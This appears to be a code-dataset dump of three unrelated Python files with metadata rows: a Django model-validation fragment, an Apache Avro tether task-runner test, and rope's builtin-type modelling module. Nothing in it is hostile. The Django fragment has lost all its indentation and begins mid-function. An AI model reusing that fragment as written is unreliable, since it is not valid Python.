try:
from PIL import Image
except ImportError:
try:
import Image
except ImportError:
e.add(opts, '"%s": To use ImageFields, you need to install the Python Imaging Library. Get it at http://www.pythonware.com/products/pil/ .' % f.name)
if isinstance(f, models.BooleanField) and getattr(f, 'null', False):
e.add(opts, '"%s": BooleanFields do not accept null values. Use a NullBooleanField instead.' % f.name)
if f.choices:
if isinstance(f.choices, basestring) or not is_iterable(f.choices):
e.add(opts, '"%s": "choices" should be iterable (e.g., a tuple or list).' % f.name)
else:
for c in f.choices:
if not isinstance(c, (list, tuple)) or len(c) != 2:
e.add(opts, '"%s": "choices" should be a sequence of two-tuples.' % f.name)
if f.db_index not in (None, True, False):
e.add(opts, '"%s": "db_index" should be either None, True or False.' % f.name)
# Perform any backend-specific field validation.
connection.validation.validate_field(e, opts, f)
# Check if the on_delete behavior is sane
if f.rel and hasattr(f.rel, 'on_delete'):
if f.rel.on_delete == SET_NULL and not f.null:
e.add(opts, "'%s' specifies on_delete=SET_NULL, but cannot be null." % f.name)
elif f.rel.on_delete == SET_DEFAULT and not f.has_default():
e.add(opts, "'%s' specifies on_delete=SET_DEFAULT, but has no default value." % f.name)
# Check to see if the related field will clash with any existing
# fields, m2m fields, m2m related objects or related objects
if f.rel:
if f.rel.to not in models.get_models():
e.add(opts, "'%s' has a relation with model %s, which has either not been installed or is abstract." % (f.name, f.rel.to))
# it is a string and we could not find the model it refers to
# so skip the next section
if isinstance(f.rel.to, (str, unicode)):
continue
# Make sure the related field specified by a ForeignKey is unique
if not f.rel.to._meta.get_field(f.rel.field_name).unique:
e.add(opts, "Field '%s' under model '%s' must have a unique=True constraint." % (f.rel.field_name, f.rel.to.__name__))
rel_opts = f.rel.to._meta
rel_name = RelatedObject(f.rel.to, cls, f).get_accessor_name()
rel_query_name = f.related_query_name()
if not f.rel.is_hidden():
for r in rel_opts.fields:
if r.name == rel_name:
e.add(opts, "Accessor for field '%s' clashes with field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
if r.name == rel_query_name:
e.add(opts, "Reverse query name for field '%s' clashes with field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
for r in rel_opts.local_many_to_many:
if r.name == rel_name:
e.add(opts, "Accessor for field '%s' clashes with m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
if r.name == rel_query_name:
e.add(opts, "Reverse query name for field '%s' clashes with m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
for r in rel_opts.get_all_related_many_to_many_objects():
if r.get_accessor_name() == rel_name:
e.add(opts, "Accessor for field '%s' clashes with related m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
if r.get_accessor_name() == rel_query_name:
e.add(opts, "Reverse query name for field '%s' clashes with related m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
for r in rel_opts.get_all_related_objects():
if r.field is not f:
if r.get_accessor_name() == rel_name:
e.add(opts, "Accessor for field '%s' clashes with related field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
if r.get_accessor_name() == rel_query_name:
e.add(opts, "Reverse query name for field '%s' clashes with related field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
seen_intermediary_signatures = []
for i, f in enumerate(opts.local_many_to_many):
# Check to see if the related m2m field will clash with any
# existing fields, m2m fields, m2m related objects or related
# objects
if f.rel.to not in models.get_models():
e.add(opts, "'%s' has an m2m relation with model %s, which has either not been installed or is abstract." % (f.name, f.rel.to))
# it is a string and we could not find the model it refers to
# so skip the next section
if isinstance(f.rel.to, (str, unicode)):
continue
# Check that the field is not set to unique. ManyToManyFields do not support unique.
if f.unique:
e.add(opts, "ManyToManyFields cannot be unique. Remove the unique argument on '%s'." % f.name)
if f.rel.through is not None and not isinstance(f.rel.through, basestring):
from_model, to_model = cls, f.rel.to
if from_model == to_model and f.rel.symmetrical and not f.rel.through._meta.auto_created:
e.add(opts, "Many-to-many fields with intermediate tables cannot be symmetrical.")
seen_from, seen_to, seen_self = False, False, 0
for inter_field in f.rel.through._meta.fields:
rel_to = getattr(inter_field.rel, 'to', None)
if from_model == to_model: # relation to self
if rel_to == from_model:
seen_self += 1
if seen_self > 2:
e.add(opts, "Intermediary model %s has more than "
"two foreign keys to %s, which is ambiguous "
"and is not permitted." % (
f.rel.through._meta.object_name,
from_model._meta.object_name
)
)
else:
if rel_to == from_model:
if seen_from:
e.add(opts, "Intermediary model %s has more "
"than one foreign key to %s, which is "
"ambiguous and is not permitted." % (
f.rel.through._meta.object_name,
from_model._meta.object_name
)
)
else:
seen_from = True
elif rel_to == to_model:
if seen_to:
e.add(opts, "Intermediary model %s has more "
"than one foreign key to %s, which is "
"ambiguous and is not permitted." % (
f.rel.through._meta.object_name,
rel_to._meta.object_name
)
)
else:
seen_to = True
if f.rel.through not in models.get_models(include_auto_created=True):
e.add(opts, "'%s' specifies an m2m relation through model "
"%s, which has not been installed." % (f.name, f.rel.through)
)
signature = (f.rel.to, cls, f.rel.through)
if signature in seen_intermediary_signatures:
e.add(opts, "The model %s has two manually-defined m2m "
"relations through the model %s, which is not "
"permitted. Please consider using an extra field on "
"your intermediary model instead." % (
cls._meta.object_name,
f.rel.through._meta.object_name
)
)
else:
seen_intermediary_signatures.append(signature)
if not f.rel.through._meta.auto_created:
seen_related_fk, seen_this_fk = False, False
for field in f.rel.through._meta.fields:
if field.rel:
if not seen_related_fk and field.rel.to == f.rel.to:
seen_related_fk = True
elif field.rel.to == cls:
seen_this_fk = True
if not seen_related_fk or not seen_this_fk:
e.add(opts, "'%s' is a manually-defined m2m relation "
"through model %s, which does not have foreign keys "
"to %s and %s" % (f.name, f.rel.through._meta.object_name,
f.rel.to._meta.object_name, cls._meta.object_name)
)
elif isinstance(f.rel.through, basestring):
e.add(opts, "'%s' specifies an m2m relation through model %s, "
"which has not been installed" % (f.name, f.rel.through)
)
rel_opts = f.rel.to._meta
rel_name = RelatedObject(f.rel.to, cls, f).get_accessor_name()
rel_query_name = f.related_query_name()
# If rel_name is none, there is no reverse accessor (this only
# occurs for symmetrical m2m relations to self). If this is the
# case, there are no clashes to check for this field, as there are
# no reverse descriptors for this field.
if rel_name is not None:
for r in rel_opts.fields:
if r.name == rel_name:
e.add(opts, "Accessor for m2m field '%s' clashes with field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
if r.name == rel_query_name:
e.add(opts, "Reverse query name for m2m field '%s' clashes with field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
for r in rel_opts.local_many_to_many:
if r.name == rel_name:
e.add(opts, "Accessor for m2m field '%s' clashes with m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
if r.name == rel_query_name:
e.add(opts, "Reverse query name for m2m field '%s' clashes with m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
for r in rel_opts.get_all_related_many_to_many_objects():
if r.field is not f:
if r.get_accessor_name() == rel_name:
e.add(opts, "Accessor for m2m field '%s' clashes with related m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
if r.get_accessor_name() == rel_query_name:
e.add(opts, "Reverse query name for m2m field '%s' clashes with related m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
for r in rel_opts.get_all_related_objects():
if r.get_accessor_name() == rel_name:
e.add(opts, "Accessor for m2m field '%s' clashes with related field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
if r.get_accessor_name() == rel_query_name:
e.add(opts, "Reverse query name for m2m field '%s' clashes with related field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
# Check ordering attribute.
if opts.ordering:
for field_name in opts.ordering:
if field_name == '?': continue
if field_name.startswith('-'):
field_name = field_name[1:]
if opts.order_with_respect_to and field_name == '_order':
continue
# Skip ordering in the format field1__field2 (FIXME: checking
# this format would be nice, but it's a little fiddly).
if '__' in field_name:
continue
# Skip ordering on pk. This is always a valid order_by field
# but is an alias and therefore won't be found by opts.get_field.
if field_name == 'pk':
continue
try:
opts.get_field(field_name, many_to_many=False)
except models.FieldDoesNotExist:
e.add(opts, '"ordering" refers to "%s", a field that doesn\'t exist.' % field_name)
# Check unique_together.
for ut in opts.unique_together:
for field_name in ut:
try:
f = opts.get_field(field_name, many_to_many=True)
except models.FieldDoesNotExist:
e.add(opts, '"unique_together" refers to %s, a field that doesn\'t exist. Check your syntax.' % field_name)
else:
if isinstance(f.rel, models.ManyToManyRel):
e.add(opts, '"unique_together" refers to %s. ManyToManyFields are not supported in unique_together.' % f.name)
if f not in opts.local_fields:
e.add(opts, '"unique_together" refers to %s. This is not in the same model as the unique_together statement.' % f.name)
return len(e.errors)
| bsd-3-clause | -2,841,106,535,951,618,000 | 63.435065 | 264 | 0.52207 | false |
apache/avro | lang/py/avro/test/test_tether_task_runner.py | 2 | 6739 | #!/usr/bin/env python3
##
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import io
import logging
import os
import subprocess
import sys
import time
import unittest
import avro.io
import avro.test.mock_tether_parent
import avro.test.word_count_task
import avro.tether.tether_task
import avro.tether.tether_task_runner
import avro.tether.util
class TestTetherTaskRunner(unittest.TestCase):
"""unit test for a tethered task runner."""
def test1(self):
# set the logging level to debug so that debug messages are printed
logging.basicConfig(level=logging.DEBUG)
proc = None
try:
# launch the server in a separate process
parent_port = avro.tether.util.find_port()
pyfile = avro.test.mock_tether_parent.__file__
proc = subprocess.Popen([sys.executable, pyfile, "start_server", f"{parent_port}"])
input_port = avro.tether.util.find_port()
print(f"Mock server started process pid={proc.pid}")
# Possible race condition? open tries to connect to the subprocess before the subprocess is fully started
# so we give the subprocess time to start up
time.sleep(1)
runner = avro.tether.tether_task_runner.TaskRunner(avro.test.word_count_task.WordCountTask())
runner.start(outputport=parent_port, join=False)
# Test sending various messages to the server and ensuring they are processed correctly
requestor = avro.tether.tether_task.HTTPRequestor(
"localhost",
runner.server.server_address[1],
avro.tether.tether_task.inputProtocol,
)
            # TODO: We should validate that open worked by grabbing the STDOUT of the subprocess
            # and ensuring that it printed the correct message.
# Test the mapper
requestor.request(
"configure",
{
"taskType": avro.tether.tether_task.TaskType.MAP,
"inSchema": str(runner.task.inschema),
"outSchema": str(runner.task.midschema),
},
)
# Serialize some data so we can send it to the input function
datum = "This is a line of text"
writer = io.BytesIO()
encoder = avro.io.BinaryEncoder(writer)
datum_writer = avro.io.DatumWriter(runner.task.inschema)
datum_writer.write(datum, encoder)
writer.seek(0)
data = writer.read()
# Call input to simulate calling map
requestor.request("input", {"data": data, "count": 1})
# Test the reducer
requestor.request(
"configure",
{
"taskType": avro.tether.tether_task.TaskType.REDUCE,
"inSchema": str(runner.task.midschema),
"outSchema": str(runner.task.outschema),
},
)
# Serialize some data so we can send it to the input function
datum = {"key": "word", "value": 2}
writer = io.BytesIO()
encoder = avro.io.BinaryEncoder(writer)
datum_writer = avro.io.DatumWriter(runner.task.midschema)
datum_writer.write(datum, encoder)
writer.seek(0)
data = writer.read()
# Call input to simulate calling reduce
requestor.request("input", {"data": data, "count": 1})
requestor.request("complete", {})
runner.task.ready_for_shutdown.wait()
runner.server.shutdown()
# time.sleep(2)
# runner.server.shutdown()
sthread = runner.sthread
# Possible race condition?
time.sleep(1)
# make sure the other thread terminated
self.assertFalse(sthread.is_alive())
# shutdown the logging
logging.shutdown()
finally:
# close the process
if not (proc is None):
proc.kill()
def test2(self):
"""
In this test we want to make sure that when we run "tether_task_runner.py"
as our main script everything works as expected. We do this by using subprocess to run it
in a separate thread.
"""
proc = None
runnerproc = None
try:
# launch the server in a separate process
parent_port = avro.tether.util.find_port()
pyfile = avro.test.mock_tether_parent.__file__
proc = subprocess.Popen([sys.executable, pyfile, "start_server", f"{parent_port}"])
# Possible race condition? when we start tether_task_runner it will call
# open tries to connect to the subprocess before the subprocess is fully started
# so we give the subprocess time to start up
time.sleep(1)
# start the tether_task_runner in a separate process
runnerproc = subprocess.Popen(
[
sys.executable,
avro.tether.tether_task_runner.__file__,
"avro.test.word_count_task.WordCountTask",
],
env={"AVRO_TETHER_OUTPUT_PORT": f"{parent_port}", "PYTHONPATH": ":".join(sys.path)},
)
# possible race condition wait for the process to start
time.sleep(1)
print(f"Mock server started process pid={proc.pid}")
# Possible race condition? open tries to connect to the subprocess before the subprocess is fully started
# so we give the subprocess time to start up
time.sleep(1)
finally:
# close the process
if not (runnerproc is None):
runnerproc.kill()
if not (proc is None):
proc.kill()
if __name__ == ("__main__"): # pragma: no coverage
unittest.main()
| apache-2.0 | -497,161,027,172,772,400 | 34.845745 | 117 | 0.591779 | false |
muff1nman/Vim | vim/eclim/autoload/eclim/python/rope/base/builtins.py | 9 | 23636 | """This module tries to support builtin types and functions."""
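# Rough usage sketch, for orientation only (uses only names defined in this
# module; `builtins` is the BuiltinModule instance created at the bottom):
#   list_type = builtins.get_attributes()['list'].get_object()
#   'append' in list_type.get_attributes()    # -> True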
import inspect
import rope.base.evaluate
from rope.base import pynames, pyobjects, arguments, utils
class BuiltinModule(pyobjects.AbstractModule):
def __init__(self, name, pycore=None, initial={}):
super(BuiltinModule, self).__init__()
self.name = name
self.pycore = pycore
self.initial = initial
parent = None
def get_attributes(self):
return self.attributes
def get_doc(self):
if self.module:
return self.module.__doc__
def get_name(self):
return self.name.split('.')[-1]
@property
@utils.saveit
def attributes(self):
result = _object_attributes(self.module, self)
result.update(self.initial)
if self.pycore is not None:
submodules = self.pycore._builtin_submodules(self.name)
for name, module in submodules.iteritems():
result[name] = rope.base.builtins.BuiltinName(module)
return result
@property
@utils.saveit
def module(self):
try:
result = __import__(self.name)
for token in self.name.split('.')[1:]:
result = getattr(result, token, None)
return result
except ImportError:
return
class _BuiltinElement(object):
def __init__(self, builtin, parent=None):
self.builtin = builtin
self._parent = parent
def get_doc(self):
if self.builtin:
return getattr(self.builtin, '__doc__', None)
def get_name(self):
if self.builtin:
return getattr(self.builtin, '__name__', None)
@property
def parent(self):
if self._parent is None:
return builtins
return self._parent
class BuiltinClass(_BuiltinElement, pyobjects.AbstractClass):
def __init__(self, builtin, attributes, parent=None):
_BuiltinElement.__init__(self, builtin, parent)
pyobjects.AbstractClass.__init__(self)
self.initial = attributes
@utils.saveit
def get_attributes(self):
result = _object_attributes(self.builtin, self)
result.update(self.initial)
return result
class BuiltinFunction(_BuiltinElement, pyobjects.AbstractFunction):
def __init__(self, returned=None, function=None, builtin=None,
argnames=[], parent=None):
_BuiltinElement.__init__(self, builtin, parent)
pyobjects.AbstractFunction.__init__(self)
self.argnames = argnames
self.returned = returned
self.function = function
def get_returned_object(self, args):
if self.function is not None:
return self.function(_CallContext(self.argnames, args))
else:
return self.returned
def get_param_names(self, special_args=True):
return self.argnames
class BuiltinUnknown(_BuiltinElement, pyobjects.PyObject):
def __init__(self, builtin):
super(BuiltinUnknown, self).__init__(pyobjects.get_unknown())
self.builtin = builtin
self.type = pyobjects.get_unknown()
@utils.saveit
def get_attributes(self):
return _object_attributes(self.builtin, self)
def _object_attributes(obj, parent):
attributes = {}
for name in dir(obj):
if name == 'None':
continue
child = getattr(obj, name)
pyobject = None
if inspect.isclass(child):
pyobject = BuiltinClass(child, {}, parent=parent)
elif inspect.isroutine(child):
pyobject = BuiltinFunction(builtin=child, parent=parent)
else:
pyobject = BuiltinUnknown(builtin=child)
attributes[name] = BuiltinName(pyobject)
return attributes
def _create_builtin_type_getter(cls):
def _get_builtin(*args):
if not hasattr(cls, '_generated'):
cls._generated = {}
if args not in cls._generated:
cls._generated[args] = cls(*args)
return cls._generated[args]
return _get_builtin
def _create_builtin_getter(cls):
type_getter = _create_builtin_type_getter(cls)
def _get_builtin(*args):
return pyobjects.PyObject(type_getter(*args))
return _get_builtin
class _CallContext(object):
def __init__(self, argnames, args):
self.argnames = argnames
self.args = args
def _get_scope_and_pyname(self, pyname):
if pyname is not None and isinstance(pyname, pynames.AssignedName):
pymodule, lineno = pyname.get_definition_location()
if pymodule is None:
return None, None
if lineno is None:
lineno = 1
scope = pymodule.get_scope().get_inner_scope_for_line(lineno)
name = None
while name is None and scope is not None:
for current in scope.get_names():
if scope[current] is pyname:
name = current
break
else:
scope = scope.parent
return scope, name
return None, None
def get_argument(self, name):
if self.args:
args = self.args.get_arguments(self.argnames)
return args[self.argnames.index(name)]
def get_pyname(self, name):
if self.args:
args = self.args.get_pynames(self.argnames)
if name in self.argnames:
return args[self.argnames.index(name)]
def get_arguments(self, argnames):
if self.args:
return self.args.get_arguments(argnames)
def get_pynames(self, argnames):
if self.args:
return self.args.get_pynames(argnames)
def get_per_name(self):
if self.args is None:
return None
pyname = self.args.get_instance_pyname()
scope, name = self._get_scope_and_pyname(pyname)
if name is not None:
pymodule = pyname.get_definition_location()[0]
return pymodule.pycore.object_info.get_per_name(scope, name)
return None
def save_per_name(self, value):
if self.args is None:
return None
pyname = self.args.get_instance_pyname()
scope, name = self._get_scope_and_pyname(pyname)
if name is not None:
pymodule = pyname.get_definition_location()[0]
pymodule.pycore.object_info.save_per_name(scope, name, value)
class _AttributeCollector(object):
def __init__(self, type):
self.attributes = {}
self.type = type
def __call__(self, name, returned=None, function=None,
argnames=['self'], check_existence=True):
try:
builtin = getattr(self.type, name)
except AttributeError:
if check_existence:
raise
builtin=None
self.attributes[name] = BuiltinName(
BuiltinFunction(returned=returned, function=function,
argnames=argnames, builtin=builtin))
def __setitem__(self, name, value):
self.attributes[name] = value
class List(BuiltinClass):
def __init__(self, holding=None):
self.holding = holding
collector = _AttributeCollector(list)
collector('__iter__', function=self._iterator_get)
collector('__new__', function=self._new_list)
# Adding methods
collector('append', function=self._list_add, argnames=['self', 'value'])
collector('__setitem__', function=self._list_add,
argnames=['self', 'index', 'value'])
collector('insert', function=self._list_add,
argnames=['self', 'index', 'value'])
collector('extend', function=self._self_set,
argnames=['self', 'iterable'])
# Getting methods
collector('__getitem__', function=self._list_get)
collector('pop', function=self._list_get)
collector('__getslice__', function=self._self_get)
super(List, self).__init__(list, collector.attributes)
def _new_list(self, args):
return _create_builtin(args, get_list)
def _list_add(self, context):
if self.holding is not None:
return
holding = context.get_argument('value')
if holding is not None and holding != pyobjects.get_unknown():
context.save_per_name(holding)
def _self_set(self, context):
if self.holding is not None:
return
iterable = context.get_pyname('iterable')
holding = _infer_sequence_for_pyname(iterable)
if holding is not None and holding != pyobjects.get_unknown():
context.save_per_name(holding)
def _list_get(self, context):
if self.holding is not None:
return self.holding
return context.get_per_name()
def _iterator_get(self, context):
return get_iterator(self._list_get(context))
def _self_get(self, context):
return get_list(self._list_get(context))
get_list = _create_builtin_getter(List)
get_list_type = _create_builtin_type_getter(List)
class Dict(BuiltinClass):
def __init__(self, keys=None, values=None):
self.keys = keys
self.values = values
item = get_tuple(self.keys, self.values)
collector = _AttributeCollector(dict)
collector('__new__', function=self._new_dict)
collector('__setitem__', function=self._dict_add)
collector('popitem', function=self._item_get)
collector('pop', function=self._value_get)
collector('get', function=self._key_get)
collector('keys', function=self._key_list)
collector('values', function=self._value_list)
collector('items', function=self._item_list)
collector('copy', function=self._self_get)
collector('__getitem__', function=self._value_get)
collector('__iter__', function=self._key_iter)
collector('update', function=self._self_set)
super(Dict, self).__init__(dict, collector.attributes)
def _new_dict(self, args):
def do_create(holding=None):
if holding is None:
return get_dict()
type = holding.get_type()
if isinstance(type, Tuple) and len(type.get_holding_objects()) == 2:
return get_dict(*type.get_holding_objects())
return _create_builtin(args, do_create)
def _dict_add(self, context):
if self.keys is not None:
return
key, value = context.get_arguments(['self', 'key', 'value'])[1:]
if key is not None and key != pyobjects.get_unknown():
context.save_per_name(get_tuple(key, value))
def _item_get(self, context):
if self.keys is not None:
return get_tuple(self.keys, self.values)
item = context.get_per_name()
if item is None or not isinstance(item.get_type(), Tuple):
return get_tuple(self.keys, self.values)
return item
def _value_get(self, context):
item = self._item_get(context).get_type()
return item.get_holding_objects()[1]
def _key_get(self, context):
item = self._item_get(context).get_type()
return item.get_holding_objects()[0]
def _value_list(self, context):
return get_list(self._value_get(context))
def _key_list(self, context):
return get_list(self._key_get(context))
def _item_list(self, context):
return get_list(self._item_get(context))
def _value_iter(self, context):
return get_iterator(self._value_get(context))
def _key_iter(self, context):
return get_iterator(self._key_get(context))
def _item_iter(self, context):
return get_iterator(self._item_get(context))
def _self_get(self, context):
item = self._item_get(context).get_type()
key, value = item.get_holding_objects()[:2]
return get_dict(key, value)
def _self_set(self, context):
if self.keys is not None:
return
new_dict = context.get_pynames(['self', 'd'])[1]
if new_dict and isinstance(new_dict.get_object().get_type(), Dict):
args = arguments.ObjectArguments([new_dict])
items = new_dict.get_object()['popitem'].\
get_object().get_returned_object(args)
context.save_per_name(items)
else:
holding = _infer_sequence_for_pyname(new_dict)
if holding is not None and isinstance(holding.get_type(), Tuple):
context.save_per_name(holding)
get_dict = _create_builtin_getter(Dict)
get_dict_type = _create_builtin_type_getter(Dict)
class Tuple(BuiltinClass):
def __init__(self, *objects):
self.objects = objects
first = None
if objects:
first = objects[0]
attributes = {
'__getitem__': BuiltinName(BuiltinFunction(first)),
'__getslice__': BuiltinName(BuiltinFunction(pyobjects.PyObject(self))),
'__new__': BuiltinName(BuiltinFunction(function=self._new_tuple)),
'__iter__': BuiltinName(BuiltinFunction(get_iterator(first)))}
super(Tuple, self).__init__(tuple, attributes)
def get_holding_objects(self):
return self.objects
def _new_tuple(self, args):
return _create_builtin(args, get_tuple)
get_tuple = _create_builtin_getter(Tuple)
get_tuple_type = _create_builtin_type_getter(Tuple)
class Set(BuiltinClass):
def __init__(self, holding=None):
self.holding = holding
collector = _AttributeCollector(set)
collector('__new__', function=self._new_set)
self_methods = ['copy', 'difference', 'intersection',
'symmetric_difference', 'union']
for method in self_methods:
collector(method, function=self._self_get)
collector('add', function=self._set_add)
collector('update', function=self._self_set)
collector('update', function=self._self_set)
collector('symmetric_difference_update', function=self._self_set)
collector('difference_update', function=self._self_set)
collector('pop', function=self._set_get)
collector('__iter__', function=self._iterator_get)
super(Set, self).__init__(set, collector.attributes)
def _new_set(self, args):
return _create_builtin(args, get_set)
def _set_add(self, context):
if self.holding is not None:
return
holding = context.get_arguments(['self', 'value'])[1]
if holding is not None and holding != pyobjects.get_unknown():
context.save_per_name(holding)
def _self_set(self, context):
if self.holding is not None:
return
iterable = context.get_pyname('iterable')
holding = _infer_sequence_for_pyname(iterable)
if holding is not None and holding != pyobjects.get_unknown():
context.save_per_name(holding)
def _set_get(self, context):
if self.holding is not None:
return self.holding
return context.get_per_name()
def _iterator_get(self, context):
return get_iterator(self._set_get(context))
def _self_get(self, context):
return get_list(self._set_get(context))
get_set = _create_builtin_getter(Set)
get_set_type = _create_builtin_type_getter(Set)
class Str(BuiltinClass):
def __init__(self):
self_object = pyobjects.PyObject(self)
collector = _AttributeCollector(str)
collector('__iter__', get_iterator(self_object), check_existence=False)
self_methods = ['__getitem__', '__getslice__', 'capitalize', 'center',
'decode', 'encode', 'expandtabs', 'join', 'ljust',
'lower', 'lstrip', 'replace', 'rjust', 'rstrip', 'strip',
'swapcase', 'title', 'translate', 'upper', 'zfill']
for method in self_methods:
collector(method, self_object)
for method in ['rsplit', 'split', 'splitlines']:
collector(method, get_list(self_object))
super(Str, self).__init__(str, collector.attributes)
def get_doc(self):
return str.__doc__
get_str = _create_builtin_getter(Str)
get_str_type = _create_builtin_type_getter(Str)
class BuiltinName(pynames.PyName):
def __init__(self, pyobject):
self.pyobject = pyobject
def get_object(self):
return self.pyobject
def get_definition_location(self):
return (None, None)
class Iterator(pyobjects.AbstractClass):
def __init__(self, holding=None):
super(Iterator, self).__init__()
self.holding = holding
self.attributes = {
'next': BuiltinName(BuiltinFunction(self.holding)),
'__iter__': BuiltinName(BuiltinFunction(self))}
def get_attributes(self):
return self.attributes
def get_returned_object(self, args):
return self.holding
get_iterator = _create_builtin_getter(Iterator)
class Generator(pyobjects.AbstractClass):
def __init__(self, holding=None):
super(Generator, self).__init__()
self.holding = holding
self.attributes = {
'next': BuiltinName(BuiltinFunction(self.holding)),
'__iter__': BuiltinName(BuiltinFunction(get_iterator(self.holding))),
'close': BuiltinName(BuiltinFunction()),
'send': BuiltinName(BuiltinFunction()),
'throw': BuiltinName(BuiltinFunction())}
def get_attributes(self):
return self.attributes
def get_returned_object(self, args):
return self.holding
get_generator = _create_builtin_getter(Generator)
class File(BuiltinClass):
def __init__(self):
self_object = pyobjects.PyObject(self)
str_object = get_str()
str_list = get_list(get_str())
attributes = {}
def add(name, returned=None, function=None):
builtin = getattr(file, name, None)
attributes[name] = BuiltinName(
BuiltinFunction(returned=returned, function=function,
builtin=builtin))
add('__iter__', get_iterator(str_object))
for method in ['next', 'read', 'readline', 'readlines']:
add(method, str_list)
for method in ['close', 'flush', 'lineno', 'isatty', 'seek', 'tell',
'truncate', 'write', 'writelines']:
add(method)
super(File, self).__init__(file, attributes)
get_file = _create_builtin_getter(File)
get_file_type = _create_builtin_type_getter(File)
class Property(BuiltinClass):
def __init__(self, fget=None, fset=None, fdel=None, fdoc=None):
self._fget = fget
self._fdoc = fdoc
attributes = {
'fget': BuiltinName(BuiltinFunction()),
'fset': BuiltinName(pynames.UnboundName()),
'fdel': BuiltinName(pynames.UnboundName()),
'__new__': BuiltinName(BuiltinFunction(function=_property_function))}
super(Property, self).__init__(property, attributes)
def get_property_object(self, args):
if isinstance(self._fget, pyobjects.AbstractFunction):
return self._fget.get_returned_object(args)
def _property_function(args):
parameters = args.get_arguments(['fget', 'fset', 'fdel', 'fdoc'])
return pyobjects.PyObject(Property(parameters[0]))
class Lambda(pyobjects.AbstractFunction):
def __init__(self, node, scope):
super(Lambda, self).__init__()
self.node = node
self.scope = scope
def get_returned_object(self, args):
result = rope.base.evaluate.eval_node(self.scope, self.node.body)
if result is not None:
return result.get_object()
else:
return pyobjects.get_unknown()
def get_pattributes(self):
return {}
class BuiltinObject(BuiltinClass):
def __init__(self):
super(BuiltinObject, self).__init__(object, {})
class BuiltinType(BuiltinClass):
def __init__(self):
super(BuiltinType, self).__init__(type, {})
def _infer_sequence_for_pyname(pyname):
if pyname is None:
return None
seq = pyname.get_object()
args = arguments.ObjectArguments([pyname])
if '__iter__' in seq:
iter = seq['__iter__'].get_object().\
get_returned_object(args)
if iter is not None and 'next' in iter:
holding = iter['next'].get_object().\
get_returned_object(args)
return holding
def _create_builtin(args, creator):
passed = args.get_pynames(['sequence'])[0]
if passed is None:
holding = None
else:
holding = _infer_sequence_for_pyname(passed)
if holding is not None:
return creator(holding)
else:
return creator()
def _range_function(args):
return get_list()
def _reversed_function(args):
return _create_builtin(args, get_iterator)
def _sorted_function(args):
return _create_builtin(args, get_list)
def _super_function(args):
passed_class, passed_self = args.get_arguments(['type', 'self'])
if passed_self is None:
return passed_class
else:
#pyclass = passed_self.get_type()
pyclass = passed_class
if isinstance(pyclass, pyobjects.AbstractClass):
supers = pyclass.get_superclasses()
if supers:
return pyobjects.PyObject(supers[0])
return passed_self
def _zip_function(args):
args = args.get_pynames(['sequence'])
objects = []
for seq in args:
if seq is None:
holding = None
else:
holding = _infer_sequence_for_pyname(seq)
objects.append(holding)
tuple = get_tuple(*objects)
return get_list(tuple)
def _enumerate_function(args):
passed = args.get_pynames(['sequence'])[0]
if passed is None:
holding = None
else:
holding = _infer_sequence_for_pyname(passed)
tuple = get_tuple(None, holding)
return get_iterator(tuple)
def _iter_function(args):
passed = args.get_pynames(['sequence'])[0]
if passed is None:
holding = None
else:
holding = _infer_sequence_for_pyname(passed)
return get_iterator(holding)
def _input_function(args):
return get_str()
_initial_builtins = {
'list': BuiltinName(get_list_type()),
'dict': BuiltinName(get_dict_type()),
'tuple': BuiltinName(get_tuple_type()),
'set': BuiltinName(get_set_type()),
'str': BuiltinName(get_str_type()),
'file': BuiltinName(get_file_type()),
'open': BuiltinName(get_file_type()),
'unicode': BuiltinName(get_str_type()),
'range': BuiltinName(BuiltinFunction(function=_range_function, builtin=range)),
'reversed': BuiltinName(BuiltinFunction(function=_reversed_function, builtin=reversed)),
'sorted': BuiltinName(BuiltinFunction(function=_sorted_function, builtin=sorted)),
'super': BuiltinName(BuiltinFunction(function=_super_function, builtin=super)),
'property': BuiltinName(BuiltinFunction(function=_property_function, builtin=property)),
'zip': BuiltinName(BuiltinFunction(function=_zip_function, builtin=zip)),
'enumerate': BuiltinName(BuiltinFunction(function=_enumerate_function, builtin=enumerate)),
'object': BuiltinName(BuiltinObject()),
'type': BuiltinName(BuiltinType()),
'iter': BuiltinName(BuiltinFunction(function=_iter_function, builtin=iter)),
'raw_input': BuiltinName(BuiltinFunction(function=_input_function, builtin=raw_input)),
}
builtins = BuiltinModule('__builtin__', initial=_initial_builtins)
